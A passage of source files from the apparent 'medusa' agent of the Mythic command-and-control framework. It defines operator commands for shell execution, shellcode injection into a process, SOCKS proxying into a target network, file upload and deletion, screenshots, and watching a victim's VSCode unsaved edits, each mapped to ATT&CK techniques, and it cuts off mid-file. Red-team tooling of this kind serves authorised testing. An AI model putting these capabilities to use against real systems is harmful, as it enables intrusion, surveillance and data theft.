    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass RmArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"path\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True\n                )],\n                description=\"Read and output the content of a file\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                temp_json = json.loads(self.command_line)\n                if \"host\" in temp_json:\n                    # this means we have tasking from the file browser rather than the popup UI\n                    # the apfell agent doesn't currently have the ability to do _remote_ listings, so we ignore it\n                    self.add_arg(\"path\", temp_json[\"path\"] + \"/\" + temp_json[\"file\"])\n                else:\n                    self.add_arg(\"path\", temp_json[\"path\"])\n            else:\n                self.add_arg(\"path\", self.command_line)\n        else:\n            raise ValueError(\"Missing arguments\")\n\n\nclass RmCommand(CommandBase):\n    cmd = \"rm\"\n    needs_admin = False\n    help_cmd = \"rm /path/to/file\"\n    description = \"Delete a file or folder\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [ \"T1485\" ]\n    supported_ui_features = [\"file_browser:remove\"]\n    argument_class = RmArguments\n    browser_script = BrowserScript(script_name=\"ls\", author=\"@its_a_feature_\")\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = \"Deleting \" + str(task.args.get_arg(\"path\"))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/screenshot.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nimport datetime\nfrom mythic_container.MythicRPC import *\nfrom mythic_container.PayloadBuilder import *\n\nclass ScreenshotArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = []\n\n    async def parse_arguments(self):\n        pass\n\n\nclass ScreenshotCommand(CommandBase):\n    cmd = \"screenshot\"\n    needs_admin = False\n    help_cmd = \"screenshot\"\n    description = \"Use the built-in CGDisplay API calls to capture the display and send it back over the C2 channel.\"\n    version = 1\n    author = \"@ajpc500\"\n    parameters = []\n    attackmapping = [\"T1113\"]\n    argument_class = ScreenshotArguments\n    browser_script = BrowserScript(script_name=\"screenshot\", author=\"@its_a_feature_\", for_new_ui=True)\n    attributes = CommandAttributes(\n        filter_by_build_parameter={\n            \"python_version\": \"Python 2.7\"\n        },\n        supported_python_versions=[\"Python 2.7\"],\n        supported_os=[ SupportedOS.MacOS ]\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        resp = await MythicRPC().execute(\"create_artifact\", task_id=task.id,\n            artifact=\"CG.CGWindowListCreateImage(region, CG.kCGWindowListOptionOnScreenOnly, CG.kCGNullWindowID, CG.kCGWindowImageDefault)\",\n            artifact_type=\"API Called\",\n        )\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/shell.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\n\n\nclass ShellArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"command\", \n                type=ParameterType.String, \n                description=\"Command to run\"\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) == 0:\n            raise ValueError(\"Must supply a command to run\")\n        self.add_arg(\"command\", self.command_line)\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\nclass ShellCommand(CommandBase):\n    cmd = \"shell\"\n    needs_admin = False\n    help_cmd = \"shell {command}\"\n    description = \"This runs {command} in a terminal.\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [\"T1059\"]\n    argument_class = ShellArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[ SupportedOS.MacOS, SupportedOS.Linux, SupportedOS.Windows ]\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = task.args.get_arg(\"command\")\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/shinject.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\nimport sys\nimport base64\n\nclass ShinjectArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"shellcode\", \n                type=ParameterType.File, \n                description=\"Shellcode to inject\"\n            ),\n            CommandParameter(\n                name=\"process_id\",\n                type=ParameterType.Number,\n                description=\"ID of process to inject into\",\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                raise ValueError(\"Missing JSON arguments\")\n        else:\n            raise ValueError(\"Missing arguments\")\n\n\nclass ShinjectCommand(CommandBase):\n    cmd = \"shinject\"\n    needs_admin = False\n    help_cmd = \"shinject\"\n    description = (\n        \"Inject shellcode from local file into target process\"\n    )\n    version = 1\n    supported_ui_features = [\"process_browser:inject\"]\n    author = \"@ajpc500\"\n    attackmapping = [ \"T1055\" ]\n\n    argument_class = ShinjectArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[ SupportedOS.Windows ]\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        try:\n            file_resp = await MythicRPC().execute(\n                \"get_file\", \n                task_id=task.id,\n                file_id=task.args.get_arg(\"shellcode\"),\n                get_contents=False\n            )\n            if file_resp.status == MythicStatus.Success:\n                original_file_name = file_resp.response[0][\"filename\"]\n\n                if len(file_resp.response) > 0:\n                    task.display_params = \"Injecting {} into PID {}\".format(original_file_name, task.args.get_arg(\"process_id\"))\n                elif len(file_resp.response) == 0:\n                    raise Exception(\"Failed to find the named file. Have you uploaded it before? Did it get deleted?\")\n            \n            file_resp = await MythicRPC().execute(\"update_file\",\n                file_id=task.args.get_arg(\"shellcode\"),\n                delete_after_fetch=True,\n                comment=\"Uploaded into memory for shinject\"\n            )\n        except Exception as e:\n            raise Exception(\"Error from Mythic: \" + str(sys.exc_info()[-1].tb_lineno) + str(e))    \n        \n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/sleep.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\ndef positiveTime(val):\n    if val < 0:\n        raise ValueError(\"Value must be positive\")\n\nclass SleepArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"jitter\",\n                type=ParameterType.Number,\n                validation_func=positiveTime,\n                default_value=-1,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False,\n                    ui_position=2\n                )],\n                description=\"Percentage of C2's interval to use as jitter\",\n            ),\n            CommandParameter(\n                name=\"seconds\",\n                type=ParameterType.Number,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True,\n                    ui_position=1\n                )],\n                validation_func=positiveTime,\n                description=\"Number of seconds between checkins\",\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            pieces = self.command_line.split(\" \")\n            if len(pieces) == 1:\n                self.add_arg(\"seconds\", pieces[0])\n                self.remove_arg(\"jitter\")\n            elif len(pieces) == 2:\n                self.add_arg(\"seconds\", pieces[0])\n                self.add_arg(\"jitter\", pieces[1])\n            else:\n                raise Exception(\"Wrong number of parameters, should be 1 or 2\")\n        else:\n            self.load_args_from_json_string(self.command_line)\n\nclass SleepCommand(CommandBase):\n    cmd = \"sleep\"\n    needs_admin = False\n    help_cmd = \"sleep seconds jitter_percentage\"\n    description = \"set sleep and jitter\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = SleepArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        task.display_params = str(task.args.get_arg(\"seconds\")) + \"s\"\n        if int(task.args.get_arg(\"jitter\")) != -1:\n            task.display_params += \" with \" + str(task.args.get_arg(\"jitter\")) + \"% jitter\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        await SendMythicRPCCallbackUpdate(MythicRPCCallbackUpdateMessage(\n            TaskID=task.Task.ID,\n            SleepInfo=response,\n        ))\n        return resp"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/socks.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\nclass SocksArguments(TaskArguments):\n\n    valid_actions = [\"start\", \"stop\"]\n\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"action\", \n                choices=[\"start\",\"stop\"], \n                parameter_group_info=[ParameterGroupInfo(\n                    required=True\n                )], \n                type=ParameterType.ChooseOne, \n                description=\"Start or stop the socks server.\"\n            ),\n            CommandParameter(\n                name=\"port\", \n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )], \n                type=ParameterType.Number, \n                description=\"Port to start the socks server on.\"\n            ),\n        ]\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n    async def parse_arguments(self):\n        if len(self.command_line) == 0:\n            raise Exception(\"Must be passed \\\"start\\\" or \\\"stop\\\" commands on the command line.\")\n        try:\n            self.load_args_from_json_string(self.command_line)\n        except:\n            parts = self.command_line.lower().split()\n            action = parts[0]\n            if action not in self.valid_actions:\n                raise Exception(\"Invalid action \\\"{}\\\" given. Require one of: {}\".format(action, \", \".join(self.valid_actions)))\n            self.add_arg(\"action\", action)\n            if action == \"start\":\n                port = -1\n                if len(parts) < 2:\n                    port = 7005\n                else:\n                    try:\n                        port = int(parts[1])\n                    except Exception as e:\n                        raise Exception(\"Invalid port number given: {}. Must be int.\".format(parts[1]))\n                self.add_arg(\"port\", port, ParameterType.Number)\n\n\nclass SocksCommand(CommandBase):\n    cmd = \"socks\"\n    needs_admin = False\n    help_cmd = \"socks [action] [port number]\"\n    description = \"Enable SOCKS 5 compliant proxy on the agent such that you may proxy data in from an outside machine into the target network.\"\n    version = 1\n    is_exit = False\n    is_file_browse = False\n    is_process_list = False\n    is_download_file = False\n    is_upload_file = False\n    is_remove_file = False\n    author = \"@ajpc500\"\n    argument_class = SocksArguments\n    attackmapping = [\"T1090\"]\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 3.8\", \"Python 2.7\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n\n    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:\n        response = PTTaskCreateTaskingMessageResponse(\n            TaskID=taskData.Task.ID,\n            Success=True,\n        )\n        if taskData.args.get_arg(\"action\") == \"start\":\n            resp = await SendMythicRPCProxyStartCommand(MythicRPCProxyStartMessage(\n                TaskID=taskData.Task.ID,\n                PortType=\"socks\",\n                LocalPort=taskData.args.get_arg(\"port\")\n            ))\n\n            if not resp.Success:\n                response.TaskStatus = MythicStatus.Error\n                response.Stderr = resp.Error\n                await SendMythicRPCResponseCreate(MythicRPCResponseCreateMessage(\n                    TaskID=taskData.Task.ID,\n                    Response=resp.Error.encode()\n                ))\n            else:\n                response.DisplayParams = \"Started SOCKS5 server on port {}\".format(taskData.args.get_arg(\"port\"))\n        else:\n            resp = await SendMythicRPCProxyStopCommand(MythicRPCProxyStopMessage(\n                TaskID=taskData.Task.ID,\n                PortType=\"socks\",\n                Port=taskData.args.get_arg(\"port\")\n            ))\n            if not resp.Success:\n                response.TaskStatus = MythicStatus.Error\n                response.Stderr = resp.Error\n                await SendMythicRPCResponseCreate(MythicRPCResponseCreateMessage(\n                    TaskID=taskData.Task.ID,\n                    Response=resp.Error.encode()\n                ))\n            else:\n                response.DisplayParams = \"Stopped SOCKS5 server on port {}\".format(taskData.args.get_arg(\"port\"))\n        return response\n\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/spawn_jxa.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\nimport sys\nimport base64\n\nclass SpawnJxaArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"file\", \n                type=ParameterType.File, \n                description=\"Script file to load\"\n            ),\n            CommandParameter(\n                name=\"language\", \n                type=ParameterType.ChooseOne,\n                choices=[ \"JavaScript\", \"AppleScript\" ],\n                default_value=\"JavaScript\", \n                description=\"Language of script to load\"\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                raise ValueError(\"Missing JSON arguments\")\n        else:\n            raise ValueError(\"Missing arguments\")\n\n\nclass SpawnJxaCommand(CommandBase):\n    cmd = \"spawn_jxa\"\n    needs_admin = False\n    help_cmd = \"spawn_jxa\"\n    description = (\n        \"Spawn an osascript process and pipe script content to it.\"\n    )\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = SpawnJxaArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        file_resp = await MythicRPC().execute(\n                \"get_file\", \n                task_id=task.id,\n                file_id=task.args.get_arg(\"file\"),\n                get_contents=False\n            )\n        if file_resp.status == MythicStatus.Success:\n            original_file_name = file_resp.response[0][\"filename\"]\n            task.display_params = f\"Spawning osascript and loading script: {original_file_name}\"\n        else:\n            raise Exception(\"Failed to register file: \" + file_resp.error)\n        \n        file_resp = await MythicRPC().execute(\"update_file\",\n                file_id=task.args.get_arg(\"file\"),\n                delete_after_fetch=True,\n                comment=\"Uploaded and piped to new osascript process\")\n        \n        \n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/unload.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json, base64, os\n\nclass UnloadArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"command\", \n                type=ParameterType.ChooseOne, \n                description=\"Command to unload from the agent\",\n                choices_are_all_commands=True,\n                choices_are_loaded_commands=True\n            )\n        ]\n            \n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            self.add_arg(\"command\", self.command_line)\n        else:\n            self.load_args_from_json_string(self.command_line)\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n\nclass UnloadCommand(CommandBase):\n    cmd = \"unload\"\n    needs_admin = False\n    help_cmd = \"unload cmd\"\n    description = \"This unloads an existing function from a callback.\"\n    version = 1\n    author = \"@ajpc500\"\n    parameters = []\n    attackmapping = [\"T1030\", \"T1129\"]\n    argument_class = UnloadArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n    async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:\n        response = PTTaskCreateTaskingMessageResponse(\n            TaskID=taskData.Task.ID,\n            Success=True,\n        )\n        unload_cmd = taskData.args.get_arg(\"command\")\n        response.DisplayParams = f\"command: {unload_cmd}\"\n        return response\n\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/unload_module.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\nimport sys\nimport base64\n\nclass UnloadModuleArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"module_name\",\n                type=ParameterType.String,\n                description=\"Name of module to load, e.g. cryptography\"\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            if self.command_line[0] == \"{\":\n                self.load_args_from_json_string(self.command_line)\n            else:\n                self.add_arg(\"module_name\", self.command_line)\n        else:\n            raise ValueError(\"Missing arguments\")\n\n\nclass UnloadModuleCommand(CommandBase):\n    cmd = \"unload_module\"\n    needs_admin = False\n    help_cmd = \"unload_module [module]\"\n    description = (\n        \"Unload an in-memory Python module from the agent\"\n    )\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    argument_class = UnloadModuleArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:        \n        task.display_params = f\"Unloading {task.args.get_arg('module_name')} module\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/upload.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json, sys, base64\n\n\nclass UploadArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"file\", \n                type=ParameterType.File, \n                description=\"file to upload\"\n            ),\n            CommandParameter(\n                name=\"remote_path\",\n                type=ParameterType.String,\n                description=\"/remote/path/on/victim.txt\",\n            ),\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) == 0:\n            raise ValueError(\"Must supply arguments\")\n        raise ValueError(\"Must supply named arguments or use the modal\")\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n\nclass UploadCommand(CommandBase):\n    cmd = \"upload\"\n    needs_admin = False\n    help_cmd = \"upload\"\n    description = (\n        \"Upload a file to the target machine by selecting a file from your computer. \"\n    )\n    version = 1\n    supported_ui_features = [\"file_browser:upload\"]\n    author = \"@its_a_feature_\"\n    attackmapping = [\"T1132\", \"T1030\", \"T1105\"]\n    argument_class = UploadArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS, SupportedOS.Windows, SupportedOS.Linux ],\n    )\n\n\n    async def create_go_tasking(self, taskData: MythicCommandBase.PTTaskMessageAllData) -> MythicCommandBase.PTTaskCreateTaskingMessageResponse:\n        response = MythicCommandBase.PTTaskCreateTaskingMessageResponse(\n            TaskID=taskData.Task.ID,\n            Success=True,\n        )\n        try:\n            file_resp = await SendMythicRPCFileSearch(MythicRPCFileSearchMessage(\n                TaskID=taskData.Task.ID,\n                AgentFileID=taskData.args.get_arg(\"file\")\n            ))\n            if file_resp.Success:\n                if len(file_resp.Files) > 0:\n                    original_file_name = file_resp.Files[0].Filename\n                    if len(taskData.args.get_arg(\"remote_path\")) == 0:\n                        taskData.args.add_arg(\"remote_path\", original_file_name)\n                    elif taskData.args.get_arg(\"remote_path\")[-1] == \"/\":\n                        taskData.args.add_arg(\"remote_path\", taskData.args.get_arg(\"remote_path\") + original_file_name)\n                    response.DisplayParams = f\"{original_file_name} to {taskData.args.get_arg('remote_path')}\"\n                else:\n                    raise Exception(\"Failed to find that file\")\n            else:\n                raise Exception(\"Error from Mythic trying to get file: \" + str(file_resp.Error))            \n        except Exception as e:\n            raise Exception(\"Error from Mythic: \" + str(sys.exc_info()[-1].tb_lineno) + \" : \" + str(e))\n        return response\n\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/vscode_list_recent.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass VscodeListRecentArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"db\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                default_value=\"\",\n                description=\"Path to VSCode state database\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            self.add_arg(\"db\", self.command_line)\n        \n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\nclass VscodeListRecentCommand(CommandBase):\n    cmd = \"vscode_list_recent\"\n    needs_admin = False\n    help_cmd = \"vscode_list_recent [state_db_path]\"\n    description = \"Lists recently accessed files/folders in VSCode state database\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    supported_ui_features = []\n    argument_class = VscodeListRecentArguments\n    browser_script = BrowserScript(script_name=\"vscode_recent\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[\n            SupportedOS.MacOS\n        ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        if task.args.get_arg(\"db\"):\n            task.display_params = \"Listing recent VSCode files from state database at \" + task.args.get_arg(\"db\")\n        else:\n            task.display_params = \"Listing recent VSCode files from state database at '~/Library/Application Support/Code/User/globalStorage/state.vscdb'\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/vscode_open_edits.py",
    "content": "from mythic_container.MythicCommandBase import *\nimport json\nfrom mythic_container.MythicRPC import *\nimport sys\n\n\nclass VscodeOpenEditsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"backups_path\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                default_value=\"\",\n                description=\"Path to VSCode backups directory\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if len(self.command_line) > 0:\n            self.add_arg(\"backups_path\", self.command_line)\n        \n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\nclass VscodeOpenEditsCommand(CommandBase):\n    cmd = \"vscode_open_edits\"\n    needs_admin = False\n    help_cmd = \"vscode_open_edits [backups_dir_path]\"\n    description = \"Lists edited files in VSCode that have not been saved.\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = []\n    supported_ui_features = []\n    argument_class = VscodeOpenEditsArguments\n    browser_script = BrowserScript(script_name=\"vscode_edits\", author=\"@ajpc500\", for_new_ui=True)\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[\n            SupportedOS.MacOS\n        ],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        if task.args.get_arg(\"backups_path\"):\n            task.display_params = \"Listing edited and unsaved files in VSCode from backup directory: \" + task.args.get_arg(\"backups_path\")\n        else:\n            task.display_params = \"Listing edited and unsaved files in VSCode from backup directory: '~/Library/Application Support/Code/Backups'\"\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/vscode_watch_edits.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\n\nclass VscodeWatchEditsArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"backups_path\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                description=\"Path of VSCode backups folder \",\n            ),\n            CommandParameter(\n                name=\"seconds\",\n                type=ParameterType.Number,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                default_value=60, \n                description=\"Seconds to wait between polling directory for changes\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            pieces = self.command_line.split(\" \")\n            if len(pieces) == 2:\n                self.add_arg(\"backups_path\", pieces[0])\n                self.add_arg(\"seconds\", pieces[1])\n            else:\n                raise Exception(\"Wrong number of parameters, should be 2\")\n        else:\n            self.load_args_from_json_string(self.command_line)\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n\nclass VscodeWatchEditsCommand(CommandBase):\n    cmd = \"vscode_watch_edits\"\n    needs_admin = False\n    help_cmd = \"vscode_watch_edits [/path/to/backups/dir]\"\n    description = \"Poll VSCode backups directory for unsaved edits\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [\"T1083\"]\n    argument_class = VscodeWatchEditsArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        supported_os=[SupportedOS.MacOS],\n    )\n\n    async def create_tasking(self, task: MythicTask) -> MythicTask:\n        if task.args.get_arg(\"backups_path\"):\n            task.display_params = \"Watching for VSCode edits. Polling '{}' for changes every {} seconds\".format(task.args.get_arg(\"backups_path\"), str(task.args.get_arg(\"seconds\")))\n        else:\n            task.display_params = \"Watching for VSCode edits. Polling '{}' for changes every {} seconds\".format(\"~/Library/Application Support/Code/Backups\", str(task.args.get_arg(\"seconds\")))\n        return task\n\n    async def process_response(self, task: PTTaskMessageAllData, response: any) -> PTTaskProcessResponseMessageResponse:\n        resp = PTTaskProcessResponseMessageResponse(TaskID=task.Task.ID, Success=True)\n        return resp\n"
  },
  {
    "path": "Payload_Type/medusa/medusa/mythic/agent_functions/watch_dir.py",
    "content": "from mythic_container.MythicCommandBase import *\nfrom mythic_container.MythicRPC import *\nimport json\n\n\nclass WatchDirArguments(TaskArguments):\n    def __init__(self, command_line, **kwargs):\n        super().__init__(command_line, **kwargs)\n        self.args = [\n            CommandParameter(\n                name=\"path\",\n                type=ParameterType.String,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=True\n                )],\n                description=\"Path of folder on the current system to watch\",\n            ),\n            CommandParameter(\n                name=\"seconds\",\n                type=ParameterType.Number,\n                parameter_group_info=[ParameterGroupInfo(\n                    required=False\n                )],\n                default_value=60, \n                description=\"Seconds to wait between polling directory for changes\",\n            )\n        ]\n\n    async def parse_arguments(self):\n        if self.command_line[0] != \"{\":\n            pieces = self.command_line.split(\" \")\n            if len(pieces) == 2:\n                self.add_arg(\"path\", pieces[0])\n                self.add_arg(\"seconds\", pieces[1])\n            else:\n                raise Exception(\"Wrong number of parameters, should be 2\")\n        else:\n            self.load_args_from_json_string(self.command_line)\n\n    async def parse_dictionary(self, dictionary_arguments):\n        self.load_args_from_dictionary(dictionary_arguments)\n\n\nclass WatchDirCommand(CommandBase):\n    cmd = \"watch_dir\"\n    needs_admin = False\n    help_cmd = \"watch_dir [/path/to/file]\"\n    description = \"Poll a directory for changes\"\n    version = 1\n    author = \"@ajpc500\"\n    attackmapping = [\"T1083\"]\n    argument_class = WatchDirArguments\n    attributes = CommandAttributes(\n        supported_python_versions=[\"Python 2.7\", \"Python 3.8\"],\n        